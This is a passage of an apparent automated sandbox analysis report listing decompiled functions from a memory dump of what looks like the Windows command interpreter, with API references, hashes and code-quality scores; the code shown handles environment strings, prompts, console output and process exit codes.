                                                      • Opcode Fuzzy Hash: 31e129cde2bd31c72010661b4d820c88308177da0ee3fdb41a9ca167d10596a9
                                                      • Instruction Fuzzy Hash: DC21B3F94CE6F1F9D372C37818165903FAE46E3121B1A46A9D4D0CBD82DA050D4DD36E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A74CF50(int __eax) {
                                                      				int _v8;
                                                      				char* _v12;
                                                      				int _v16;
                                                      				char* _t17;
                                                      				signed int _t18;
                                                      				short* _t24;
                                                      				short* _t31;
                                                      				short _t32;
                                                      				int _t33;
                                                      				short* _t36;
                                                      
                                                      				_push(0);
                                                      				_push(0);
                                                      				_v8 = 1;
                                                      				L4A752410();
                                                      				_t33 = __eax;
                                                      				if(__eax != 0) {
                                                      					_t36 = E4A732041(__eax + __eax);
                                                      					_t17 = E4A732041(_t33);
                                                      					_push(_t17);
                                                      					_push(_t33);
                                                      					_v12 = _t17;
                                                      					L4A752410();
                                                      					_t18 = E4A734B8D( *0x4a7541b8);
                                                      					asm("sbb eax, eax");
                                                      					MultiByteToWideChar( *0x4a7541b8,  ~( ~_t18), _v12, 0xffffffff, _t36, _t33);
                                                      					_v16 = SetErrorMode(1);
                                                      					while( *_t36 != 0) {
                                                      						E4A736C78(_t36, _v8);
                                                      						_t24 = _t36;
                                                      						_v8 = 0;
                                                      						_t8 =  &(_t24[1]); // 0x2
                                                      						_t31 = _t8;
                                                      						do {
                                                      							_t32 =  *_t24;
                                                      							_t24 =  &(_t24[1]);
                                                      						} while (_t32 != 0);
                                                      						_t36 = _t36 + 2 + (_t24 - _t31 >> 1) * 2;
                                                      					}
                                                      					SetErrorMode(_v16);
                                                      					return E4A73142E(_v12);
                                                      				}
                                                      				return __eax;
                                                      			}














                                                      APIs
                                                      • GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A74CF65
                                                      • GetVDMCurrentDirectories.KERNEL32(00000000,00000000), ref: 4A74CF8B
                                                      • MultiByteToWideChar.KERNEL32(00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,4A731794,=ExitCode), ref: 4A74CFAF
                                                      • SetErrorMode.KERNEL32(00000001), ref: 4A74CFBD
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000001), ref: 4A74CFEF
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CurrentDirectoriesErrorMode$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 3679696385-0
                                                      • Opcode ID: 2e6be83219daf24b1648768279c755d1b7484a34a83c71eebbe507d83ad985ab
                                                      • Instruction ID: 147bac4fe4bb9dcfe8b73ffbc34733795d178d378e8a633bed86721dce3c8e4a
                                                      • Opcode Fuzzy Hash: 2e6be83219daf24b1648768279c755d1b7484a34a83c71eebbe507d83ad985ab
                                                      • Instruction Fuzzy Hash: DB11E37290411ABECB206FF5CC48CEEBFBDEF51754B124565E502E7061DA315E49CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 60%
                                                      			E4A73D43C(void* __ecx, void* __edi, void* __esi) {
                                                      				struct _CHAR_INFO _v8;
                                                      				struct _COORD _v12;
                                                      				struct _SMALL_RECT _v20;
                                                      				short _v38;
                                                      				signed int _v42;
                                                      				struct _CONSOLE_SCREEN_BUFFER_INFO _v44;
                                                      				void* _t20;
                                                      				union %anon259 _t33;
                                                      				void* _t45;
                                                      
                                                      				if(E4A733B03(_t20, __ecx, 1) == 0) {
                                                      					_push(E4A747CA8);
                                                      					E4A7358F3();
                                                      				} else {
                                                      					_t45 = GetStdHandle(0xfffffff5);
                                                      					if(GetConsoleScreenBufferInfo(_t45,  &_v44) == 0) {
                                                      						_push(E4A747CA8);
                                                      						E4A7358F3();
                                                      					} else {
                                                      						_v12.Y =  ~_v42;
                                                      						_v12.X = 0;
                                                      						_v20.Top = 0;
                                                      						_v20.Left = 0;
                                                      						_v20.Bottom = _v42;
                                                      						_v20.Right = _v44.dwSize;
                                                      						_t33 = 0x20;
                                                      						_v8.UnicodeChar = _t33;
                                                      						_v8.Attributes = _v44.wAttributes;
                                                      						ScrollConsoleScreenBufferW(_t45,  &_v20, 0, _v12,  &_v8);
                                                      						_v44.dwCursorPosition.X = 0;
                                                      						_v38 = 0;
                                                      						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), _v44.dwCursorPosition);
                                                      					}
                                                      				}
                                                      				return 0;
                                                      			}













                                                      APIs
                                                        • Part of subcall function 4A733B03: _get_osfhandle.MSVCRT ref: 4A733B0D
                                                        • Part of subcall function 4A733B03: GetFileType.KERNEL32(00000000), ref: 4A733B17
                                                      • GetStdHandle.KERNEL32(000000F5,?,?,00000001), ref: 4A73D45D
                                                      • GetConsoleScreenBufferInfo.KERNEL32 ref: 4A73D466
                                                      • ScrollConsoleScreenBufferW.KERNEL32(00000000,?,00000000,?,?), ref: 4A73D4B8
                                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,00000001), ref: 4A73D4CD
                                                      • SetConsoleCursorPosition.KERNEL32 ref: 4A73D4D0
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 3008996577-0
                                                      • Opcode ID: c10d9907b13bf0b819effb55b9ca801686798af05f98e2fa8d75d9c6c01ca870
                                                      • Instruction ID: f4dd49f7830b6cd286dceef968944e1e38dd13f6e373ffacf8ad3f5c53b0eade
                                                      • Opcode Fuzzy Hash: c10d9907b13bf0b819effb55b9ca801686798af05f98e2fa8d75d9c6c01ca870
                                                      • Instruction Fuzzy Hash: 7211B12AA15249AACF109BE4C804AEE7BBCBF4D711F114116E510F7151EB308A44C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A737C89() {
                                                      				struct _FILETIME _v12;
                                                      				signed int _v16;
                                                      				union _LARGE_INTEGER _v20;
                                                      				signed int _t14;
                                                      				signed int _t16;
                                                      				signed int _t17;
                                                      				signed int _t18;
                                                      				signed int _t22;
                                                      				signed int _t23;
                                                      				signed int _t32;
                                                      
                                                      				_t14 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
                                                      				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
                                                      				if(_t14 != 0xbb40e64e) {
                                                      					if((0xffff0000 & _t14) == 0) {
                                                      						goto L1;
                                                      					}
                                                      					_t23 =  !_t14;
                                                      					 *0x4a7540b0 = _t23;
                                                      					return _t23;
                                                      				}
                                                      				L1:
                                                      				GetSystemTimeAsFileTime( &_v12);
                                                      				_t16 = GetCurrentProcessId();
                                                      				_t17 = GetCurrentThreadId();
                                                      				_t18 = GetTickCount();
                                                      				QueryPerformanceCounter( &_v20);
                                                      				_t22 = _v16 ^ _v20.LowPart;
                                                      				_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
                                                      				if(_t32 == 0xbb40e64e || ( *0x4a7540ac & 0xffff0000) == 0) {
                                                      					_t32 = 0xbb40e64f;
                                                      				}
                                                      				 *0x4a7540ac = _t32;
                                                      				 *0x4a7540b0 =  !_t32;
                                                      				return _t22;
                                                      			}














                                                      APIs
                                                      • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 4A737CB7
                                                      • GetCurrentProcessId.KERNEL32 ref: 4A737CC3
                                                      • GetCurrentThreadId.KERNEL32 ref: 4A737CCB
                                                      • GetTickCount.KERNEL32 ref: 4A737CD3
                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 4A737CDF
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: c7f940fe8c1a2e5a66296f5ab74b2cd7b911fed3a3bfbab670cd09d6889720a0
                                                      • Instruction ID: b97d4890de43a928b6b5b13e9c1fc8d582d3aec1011b8e7e2fc5b9aff098fe31
                                                      • Opcode Fuzzy Hash: c7f940fe8c1a2e5a66296f5ab74b2cd7b911fed3a3bfbab670cd09d6889720a0
                                                      • Instruction Fuzzy Hash: 9B115EF3D042249BCB30DBF9C84969ABBFCEB49292F570561E905E7601DB309D04CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A733BE0(void* __ecx, void* _a4) {
                                                      				long _v8;
                                                      				int _t11;
                                                      
                                                      				_v8 = _v8 | 0xffffffff;
                                                      				 *0x4a754088 = 0;
                                                      				WaitForSingleObject(_a4, 0xffffffff);
                                                      				_t11 = GetExitCodeProcess(_a4,  &_v8);
                                                      				if(_v8 == 0xc000013a) {
                                                      					E4A74E702(_t11);
                                                      					fprintf(__imp___iob + 0x40, 0x4a74bd48);
                                                      					fflush(__imp___iob + 0x40);
                                                      				}
                                                      				 *0x4a754088 = 1;
                                                      				CloseHandle(_a4);
                                                      				return _v8;
                                                      			}






                                                      APIs
                                                      • WaitForSingleObject.KERNEL32(4A754210,000000FF,?,?,4A74FD89,4A754210,?,4A7477AE,?,00000000,4A76C642,0000233F,4A743801,4A76C642,0000233F,00000000), ref: 4A733BF6
                                                      • GetExitCodeProcess.KERNEL32(4A754210,000000FF), ref: 4A733C03
                                                      • CloseHandle.KERNEL32(4A754210), ref: 4A733C20
                                                      • fprintf.MSVCRT ref: 4A749A82
                                                      • fflush.MSVCRT ref: 4A749A91
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                      • String ID:
                                                      • API String ID: 1826527819-0
                                                      • Opcode ID: 430847eae7197e254578c415ea0557bb691c58267fcb714cd15ef0cd341c34ba
                                                      • Instruction ID: 8f99afc07f08b819ef982ab98d3b232204e6b2e588c76662938f5e6819f80be7
                                                      • Opcode Fuzzy Hash: 430847eae7197e254578c415ea0557bb691c58267fcb714cd15ef0cd341c34ba
                                                      • Instruction Fuzzy Hash: A9F081F6449185EFDF209BA4CD0AA893BBCAB023A6F124140F459D6691C7318E54DB11
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E4A7316AD() {
                                                      				int _t9;
                                                      				WCHAR* _t11;
                                                      				void* _t12;
                                                      
                                                      				_t11 = GetEnvironmentStringsW();
                                                      				_t12 = 0;
                                                      				if(_t11 != 0) {
                                                      					_t9 = E4A7316FB(_t11);
                                                      					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
                                                      					if(_t12 != 0) {
                                                      						memcpy(_t12, _t11, _t9);
                                                      					}
                                                      					FreeEnvironmentStringsW(_t11);
                                                      				}
                                                      				return _t12;
                                                      			}







                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,4A737AF8,4A738533), ref: 4A7316B1
                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000), ref: 4A7316CB
                                                      • HeapAlloc.KERNEL32(00000000), ref: 4A7316D2
                                                      • memcpy.MSVCRT ref: 4A7316E1
                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 4A7316EA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                                      • String ID:
                                                      • API String ID: 713576409-0
                                                      • Opcode ID: 2d796212b19f16ff8eeb8f7a7643a56f2ec806b3163df43d6151ac2a8fe40961
                                                      • Instruction ID: 1033e3004c4b01be2416fb02f7e53f2b0d39bc3c2726d13566f625d2516113c0
                                                      • Opcode Fuzzy Hash: 2d796212b19f16ff8eeb8f7a7643a56f2ec806b3163df43d6151ac2a8fe40961
                                                      • Instruction Fuzzy Hash: 01E06DB3607921AB9A3122E99C8DCBB6F7CDBC69E27074154F904D2605DF208C06C3A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E4A73B589(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24, intOrPtr* _a28, signed int* _a32) {
                                                      				signed int _v8;
                                                      				short _v524;
                                                      				short _v526;
                                                      				char _v528;
                                                      				intOrPtr _v532;
                                                      				intOrPtr* _v536;
                                                      				WCHAR* _v540;
                                                      				signed int* _v544;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t63;
                                                      				intOrPtr* _t73;
                                                      				signed int _t75;
                                                      				intOrPtr* _t78;
                                                      				intOrPtr _t84;
                                                      				intOrPtr* _t85;
                                                      				short _t87;
                                                      				WCHAR* _t96;
                                                      				signed char _t100;
                                                      				long _t106;
                                                      				intOrPtr* _t118;
                                                      				intOrPtr* _t122;
                                                      				signed int _t128;
                                                      				intOrPtr* _t129;
                                                      				short _t131;
                                                      				intOrPtr* _t133;
                                                      				signed int _t135;
                                                      				signed int _t136;
                                                      				intOrPtr _t142;
                                                      				intOrPtr* _t143;
                                                      				intOrPtr* _t144;
                                                      				WCHAR* _t145;
                                                      				intOrPtr _t149;
                                                      				signed int _t150;
                                                      				intOrPtr* _t151;
                                                      				signed int _t153;
                                                      				WCHAR* _t155;
                                                      				signed int _t158;
                                                      				signed int _t161;
                                                      				intOrPtr* _t162;
                                                      				signed int _t165;
                                                      				short* _t166;
                                                      				signed int _t167;
                                                      				void* _t168;
                                                      				signed int _t170;
                                                      				signed int* _t171;
                                                      				void* _t172;
                                                      				intOrPtr _t173;
                                                      				signed int _t177;
                                                      				intOrPtr* _t181;
                                                      				signed int _t183;
                                                      				void* _t184;
                                                      				signed int _t187;
                                                      				void* _t209;
                                                      
                                                      				_t147 = __ecx;
                                                      				_t63 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t63 ^ _t187;
                                                      				_v532 = _a12;
                                                      				_v540 = _a20;
                                                      				_v536 = _a28;
                                                      				_v544 = _a32;
                                                      				E4A739A0D(__ecx, E4A73321B(__ecx, L"COPYCMD"), _a8);
                                                      				_t143 = E4A7322CA( *((intOrPtr*)(_a4 + 0x3c)), 0, 0);
                                                      				if(E4A739A0D(_t147, _t143, _a8) == 0) {
                                                      					L2:
                                                      					_t73 = _t143;
                                                      					_t13 = _t73 + 2; // 0x2
                                                      					_t166 = _t13;
                                                      					do {
                                                      						_t148 =  *_t73;
                                                      						_t73 = _t73 + 2;
                                                      					} while (_t148 != 0);
                                                      					_t75 = _t73 - _t166;
                                                      					_t170 = _t75 >> 1;
                                                      					if(_t75 == 0) {
                                                      						L42:
                                                      						_push(0x232a);
                                                      						L43:
                                                      						L4A74DF02(_t148, _t166);
                                                      						L44:
                                                      						_push( *0x4a754128);
                                                      						goto L43;
                                                      					}
                                                      					if(_t170 >= 0x104) {
                                                      						L35:
                                                      						_push(0x232e);
                                                      						goto L43;
                                                      					}
                                                      					_t78 = _t143;
                                                      					_t14 = _t78 + 2; // 0x2
                                                      					_t166 = _t14;
                                                      					do {
                                                      						_t149 =  *_t78;
                                                      						_t78 = _t78 + 2;
                                                      						_t194 = _t149;
                                                      					} while (_t149 != 0);
                                                      					E4A73185A(_t143, (_t78 - _t166 >> 1) + 1, E4A732598(_t149, _t143));
                                                      					_t84 = E4A739662(_t149, _t166, _t194, _t143);
                                                      					_t148 = _v536;
                                                      					 *_v536 = _t84;
                                                      					if(_t84 == 1) {
                                                      						goto L44;
                                                      					}
                                                      					_t17 = _t170 * 2; // 0x2
                                                      					_t181 = _t143 + _t17 + 2;
                                                      					if( *_t181 == 0) {
                                                      						_t85 =  *0x4a754124; // 0x0
                                                      						_v528 =  *_t85;
                                                      						_t87 = 0x3a;
                                                      						_v526 = _t87;
                                                      						_v524 = 0;
                                                      						L18:
                                                      						_t182 = _a16;
                                                      						if(E4A732FAF(_t148, _v532, _a16, _t143) != 0) {
                                                      							goto L35;
                                                      						}
                                                      						_t144 = _v536;
                                                      						if(( *( *( *_t144 + 0x18)) & 0x00000010) == 0) {
                                                      							_t172 = E4A732148(_v532,  *0x4a770664 & 0x0000ffff);
                                                      							if(_t172 == 0) {
                                                      								_t173 = _v532;
                                                      							} else {
                                                      								_t173 = _t172 + 2;
                                                      							}
                                                      							if(E4A732148( *((intOrPtr*)( *_t144 + 0x10)),  *0x4a770664 & 0x0000ffff) == 0) {
                                                      								_t111 =  *((intOrPtr*)( *_t144 + 0x10));
                                                      							}
                                                      							E4A73185A(_t173, _t182 - (_t173 - _v532 >> 1), _t111);
                                                      						}
                                                      						_t145 = _v540;
                                                      						if(E4A732FAF(_t148, _t145, _a24,  &_v528) != 0) {
                                                      							goto L35;
                                                      						} else {
                                                      							_t183 = 0;
                                                      							 *0x4a754128 = 0;
                                                      							SetLastError(0);
                                                      							_t171 = _v544;
                                                      							 *_t171 =  *_t171 & 0;
                                                      							_t209 =  *((intOrPtr*)(E4A732ED1(_t145))) -  *0x4a770664; // 0x5c
                                                      							if(_t209 == 0) {
                                                      								_t96 = _t145;
                                                      								_t183 = 1;
                                                      								__eflags = 1;
                                                      								_t166 =  &(_t96[1]);
                                                      								do {
                                                      									_t150 =  *_t96;
                                                      									_t96 =  &(_t96[1]);
                                                      									__eflags = _t150;
                                                      								} while (_t150 != 0);
                                                      								_t148 = 0;
                                                      								 *((short*)(_t145 + (_t96 - _t166 >> 1) * 2 - 2)) = 0;
                                                      							}
                                                      							_t100 = GetFileAttributesW(_t145);
                                                      							if(_t100 != 0xffffffff) {
                                                      								__eflags = _t100 & 0x00000010;
                                                      								if((_t100 & 0x00000010) != 0) {
                                                      									_t183 = 1;
                                                      									 *_t171 = 1;
                                                      								}
                                                      								L30:
                                                      								if(_t183 != 0) {
                                                      									_t151 = E4A732148(_v532,  *0x4a770664 & 0x0000ffff);
                                                      									_t41 = _t151 + 2; // 0x2
                                                      									_t184 = _t41;
                                                      									do {
                                                      										_t167 =  *_t151;
                                                      										_t151 = _t151 + 2;
                                                      										__eflags = _t167;
                                                      									} while (_t167 != 0);
                                                      									_t153 = _t151 - _t184;
                                                      									__eflags = _t153;
                                                      									_t183 = _t153 >> 1;
                                                      									_t155 = _t145;
                                                      									_t166 =  &(_t155[1]);
                                                      									do {
                                                      										_t171 =  *_t155;
                                                      										_t155 =  &(_t155[1]);
                                                      										__eflags = _t171;
                                                      									} while (_t171 != 0);
                                                      									_t158 = _t155 - _t166 >> 1;
                                                      									_t148 = _t158 + _t183 + 1;
                                                      									__eflags = _t158 + _t183 + 1 - 0x104;
                                                      									if(_t158 + _t183 + 1 > 0x104) {
                                                      										goto L35;
                                                      									}
                                                      									E4A7320A9(_t183, _t145, _a24, _t102);
                                                      								}
                                                      								return E4A7313A9(0, _t145, _v8 ^ _t187, _t166, _t171, _t183);
                                                      							}
                                                      							_t106 = GetLastError();
                                                      							 *0x4a754128 = _t106;
                                                      							if(_t106 == 0 || _t106 == 2) {
                                                      								goto L30;
                                                      							} else {
                                                      								__eflags = _t106 - 3;
                                                      								if(_t106 == 3) {
                                                      									goto L30;
                                                      								}
                                                      								_push(_t106);
                                                      								goto L43;
                                                      							}
                                                      						}
                                                      					}
                                                      					if( *((short*)(E4A73413B(_t181))) != 0) {
                                                      						goto L42;
                                                      					}
                                                      					_t118 = _t181;
                                                      					_t19 = _t118 + 2; // 0x4
                                                      					_t166 = _t19;
                                                      					do {
                                                      						_t148 =  *_t118;
                                                      						_t118 = _t118 + 2;
                                                      					} while (_t148 != 0);
                                                      					if(_t118 - _t166 >> 1 > 0x104) {
                                                      						goto L35;
                                                      					}
                                                      					_t122 = _t181;
                                                      					_t20 = _t122 + 2; // 0x4
                                                      					_t166 = _t20;
                                                      					do {
                                                      						_t148 =  *_t122;
                                                      						_t122 = _t122 + 2;
                                                      					} while (_t148 != 0);
                                                      					E4A73185A(_t181, (_t122 - _t166 >> 1) + 1, E4A732598(_t148, _t181));
                                                      					_t128 =  *(_t181 + 2) & 0x0000ffff;
                                                      					if(_t128 != 0x3a) {
                                                      						__eflags =  *_t181 - 0x5c;
                                                      						if( *_t181 != 0x5c) {
                                                      							L48:
                                                      							_t129 =  *0x4a754124; // 0x0
                                                      							_v528 =  *_t129;
                                                      							_t131 = 0x3a;
                                                      							_v526 = _t131;
                                                      							__eflags = 0;
                                                      							_v524 = 0;
                                                      							_t133 =  &_v528;
                                                      							_t168 = _t133 + 2;
                                                      							do {
                                                      								_t161 =  *_t133;
                                                      								_t133 = _t133 + 2;
                                                      								__eflags = _t161;
                                                      							} while (_t161 != 0);
                                                      							_t135 = _t133 - _t168;
                                                      							__eflags = _t135;
                                                      							_t162 = _t181;
                                                      							_t136 = _t135 >> 1;
                                                      							_t55 = _t162 + 2; // 0x4
                                                      							_t166 = _t55;
                                                      							do {
                                                      								_t177 =  *_t162;
                                                      								_t162 = _t162 + 2;
                                                      								__eflags = _t177;
                                                      							} while (_t177 != 0);
                                                      							_t165 = _t162 - _t166 >> 1;
                                                      							_t148 = _t165 + _t136 + 1;
                                                      							__eflags = _t165 + _t136 + 1 - 0x104;
                                                      							if(_t165 + _t136 + 1 > 0x104) {
                                                      								goto L35;
                                                      							}
                                                      							E4A7320A9(_t181,  &_v528, 0x104, _t181);
                                                      							goto L18;
                                                      						}
                                                      						__eflags = _t128 - 0x5c;
                                                      						if(_t128 == 0x5c) {
                                                      							goto L17;
                                                      						}
                                                      						goto L48;
                                                      					}
                                                      					L17:
                                                      					E4A73185A( &_v528, 0x104, _t181);
                                                      					goto L18;
                                                      				} else {
                                                      					goto L1;
                                                      				}
                                                      				do {
                                                      					L1:
                                                      					_t142 =  *_t143;
                                                      					_t143 = _t143 + 2;
                                                      				} while (_t142 != 0);
                                                      				goto L2;
                                                      			}
                                                      0x4a73b69f
                                                      0x4a73b6a2
                                                      0x4a73b6a2
                                                      0x4a73b6a6
                                                      0x4a73b6a7
                                                      0x4a73b6bc
                                                      0x4a73b6c1
                                                      0x4a73b6c9
                                                      0x4a745de4
                                                      0x4a745de8
                                                      0x4a745df4
                                                      0x4a745df4
                                                      0x4a745dfc
                                                      0x4a745e05
                                                      0x4a745e06
                                                      0x4a745e0d
                                                      0x4a745e0f
                                                      0x4a745e16
                                                      0x4a745e1c
                                                      0x4a745e1f
                                                      0x4a745e1f
                                                      0x4a745e23
                                                      0x4a745e24
                                                      0x4a745e24
                                                      0x4a745e29
                                                      0x4a745e29
                                                      0x4a745e2b
                                                      0x4a745e2d
                                                      0x4a745e2f
                                                      0x4a745e2f
                                                      0x4a745e32
                                                      0x4a745e32
                                                      0x4a745e36
                                                      0x4a745e37
                                                      0x4a745e37
                                                      0x4a745e3e
                                                      0x4a745e40
                                                      0x4a745e49
                                                      0x4a745e4b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a745e5a
                                                      0x00000000
                                                      0x4a745e5a
                                                      0x4a745dea
                                                      0x4a745dee
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a745dee
                                                      0x4a73b6cf
                                                      0x4a73b6dc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a73b5f5
                                                      0x4a73b5f5
                                                      0x4a73b5f5
                                                      0x4a73b5f9
                                                      0x4a73b5fa
                                                      0x00000000

                                                      APIs
                                                        • Part of subcall function 4A73321B: _wcsnicmp.MSVCRT ref: 4A73329D
                                                        • Part of subcall function 4A7322CA: iswspace.MSVCRT ref: 4A73238B
                                                      • SetLastError.KERNEL32(00000000,?,?,?,?,?,00000000,?,00000104,00000002,00000002,00000005,00000000,00000002,00000002,00000000), ref: 4A73B77E
                                                      • GetFileAttributesW.KERNEL32(?,?), ref: 4A73B7A3
                                                      • GetLastError.KERNEL32 ref: 4A73B7B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast$AttributesFile_wcsnicmpiswspace
                                                      • String ID: COPYCMD
                                                      • API String ID: 2247692152-3727491224
                                                      • Opcode ID: e08a8e486684de74be3e54a68669e62a77009a347740a15f3b6d601cefb00ebf
                                                      • Instruction ID: 2f6c0051627d9776769281b4144d5a4ef1daf751a854d9ba383c561c2b780b5c
                                                      • Opcode Fuzzy Hash: e08a8e486684de74be3e54a68669e62a77009a347740a15f3b6d601cefb00ebf
                                                      • Instruction Fuzzy Hash: 0BA14735508616DBDB709F24CC98AEA3BB9EF59310F024194E986CF653E770DE4ACB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E4A73C60C(signed int __ebx, void* __edx, void* __edi, short* __esi, void* __eflags) {
                                                      				intOrPtr* _t89;
                                                      				void* _t94;
                                                      				signed short _t96;
                                                      				intOrPtr* _t99;
                                                      				signed int _t102;
                                                      				WCHAR* _t103;
                                                      				WCHAR* _t105;
                                                      				signed int _t108;
                                                      				signed int _t110;
                                                      				intOrPtr* _t113;
                                                      				signed int _t115;
                                                      				signed int _t116;
                                                      				intOrPtr* _t122;
                                                      				void* _t135;
                                                      				WCHAR* _t138;
                                                      				void* _t139;
                                                      				signed short _t140;
                                                      				void* _t141;
                                                      				void* _t144;
                                                      				void* _t145;
                                                      				WCHAR* _t146;
                                                      				WCHAR* _t147;
                                                      				intOrPtr _t149;
                                                      				short* _t152;
                                                      				void* _t155;
                                                      				void* _t156;
                                                      				void* _t159;
                                                      				void* _t164;
                                                      
                                                      				_t152 = __esi;
                                                      				_t144 = __edx;
                                                      				_t132 = __ebx;
                                                      				_push(0x278);
                                                      				_push(0x4a73c798);
                                                      				E4A7313E1(__ebx, __edi, __esi);
                                                      				_t151 = 0;
                                                      				 *(_t155 - 0x280) = 0;
                                                      				_t159 =  *0x4a7541b4 - _t151; // 0x0
                                                      				if(_t159 != 0) {
                                                      					_push(0);
                                                      					_push(0x2335);
                                                      					E4A731E6C(E4A7399E1(_t135));
                                                      				}
                                                      				__eflags =  *0x4a75408c - _t151; // 0x1
                                                      				if(__eflags == 0) {
                                                      					L31:
                                                      					return E4A7313CA(_t132, _t151, _t152);
                                                      				} else {
                                                      					__eflags =  *0x4a754110 - _t151; // 0x0
                                                      					if(__eflags == 0) {
                                                      						_push(0x4a7545a8);
                                                      						E4A7358F3();
                                                      					}
                                                      					__eflags =  *0x4a754085;
                                                      					if( *0x4a754085 != 0) {
                                                      						goto L1;
                                                      					} else {
                                                      						_t132 = E4A732070(L"PROMPT");
                                                      						 *(_t155 - 0x278) = _t132;
                                                      						__eflags = _t132 - _t151;
                                                      						if(_t132 == _t151) {
                                                      							L14:
                                                      							_t151 = 0x4a755260;
                                                      							E4A732C56(_t132, _t144, 0x4a755260, 0x4a755260, 0x104, 0x4a755260);
                                                      							 *((intOrPtr*)(_t155 - 0x274)) = 0x4a755e40;
                                                      							 *0x4a755e40 = 0;
                                                      							 *((intOrPtr*)(_t155 - 0x270)) = 0x3ff;
                                                      							if(_t132 == 0 ||  *_t132 == 0) {
                                                      								E4A73179D(0x4a755e40, 0x3ff, L"%s>", _t151);
                                                      								_t89 = 0x4a755e40;
                                                      								_t78 = _t89 + 2; // 0x4a755e42
                                                      								_t145 = _t78;
                                                      								do {
                                                      									_t138 =  *_t89;
                                                      									_t89 = _t89 + 2;
                                                      									__eflags = _t138;
                                                      								} while (_t138 != 0);
                                                      								_t152 = 0x4a755e40 + (_t89 - _t145 >> 1) * 2;
                                                      								goto L30;
                                                      							} else {
                                                      								while(1) {
                                                      									_t96 =  *_t132 & 0x0000ffff;
                                                      									if(_t96 == 0) {
                                                      										break;
                                                      									}
                                                      									if(_t96 != 0x24) {
                                                      										E4A73179D(0x4a755e40,  *((intOrPtr*)(_t155 - 0x270)), 0x4a7545b8, _t96 & 0x0000ffff);
                                                      										_t156 = _t156 + 0x10;
                                                      										_t99 = 0x4a755e40;
                                                      										_t27 = _t99 + 2; // 0x4a755e42
                                                      										_t139 = _t27;
                                                      										do {
                                                      											_t146 =  *_t99;
                                                      											_t99 = _t99 + 2;
                                                      											__eflags = _t146;
                                                      										} while (_t146 != 0);
                                                      										_t102 = _t99 - _t139 >> 1;
                                                      										_t152 = 0x4a755e40 + _t102 * 2;
                                                      										 *((intOrPtr*)(_t155 - 0x274)) = _t152;
                                                      										 *((intOrPtr*)(_t155 - 0x270)) =  *((intOrPtr*)(_t155 - 0x270)) - _t102;
                                                      										_t103 = E4A73661C();
                                                      										__eflags = _t103;
                                                      										if(_t103 == 0) {
                                                      											L38:
                                                      											 *(_t155 - 0x280) =  *(_t155 - 0x280) & 0x00000000;
                                                      											L29:
